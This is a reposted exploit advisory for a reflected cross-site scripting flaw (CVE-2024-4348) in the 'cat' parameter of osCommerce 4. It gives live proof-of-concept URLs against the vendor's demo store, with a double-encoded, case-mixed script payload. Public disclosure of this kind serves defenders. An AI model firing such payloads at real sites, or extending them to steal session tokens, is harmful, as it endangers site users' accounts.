Exploit/Advisories no image

Published on May 1st, 2024 📆 | 6109 Views ⚑

0

osCommerce 4 Cross Site Scripting – Torchsec


Text to Speech Voices

# Exploit Title: osCommerce 4 - Reflected XSS
# Exploit Author: skalvin
# Date: 22/04/2024
# Vendor: osCommerce ltd.
# Vendor Homepage: https://www.oscommerce.com/
# Software Link: https://demo.oscommerce.com/
# Demo Link: https://demo.oscommerce.com/furniture/
# Tested on: Windows 11 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2024-4348
# VDB: VDB-262488
# CWE: CWE-79 / CWE-74 / CWE-707
# CAPEC: CAPEC-10 / CAPEC-209 / CAPEC-250
# ATT&CK: T1059.007

## Description

Attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials

GET parameter 'cat' is vulnerable to RXSS

Path: /furniture/catalog/all-products

https://demo.oscommerce.com/furniture/catalog/all-products?cat=[XSS]
https://demo.oscommerce.com/watch/catalog/all-products?cat=[XSS]





## Live POC:

https://demo.oscommerce.com/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1

https://demo.oscommerce.com/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253eiyehb=1

[-] Done

Source link

Tagged with:



Leave a Reply

Your email address will not be published.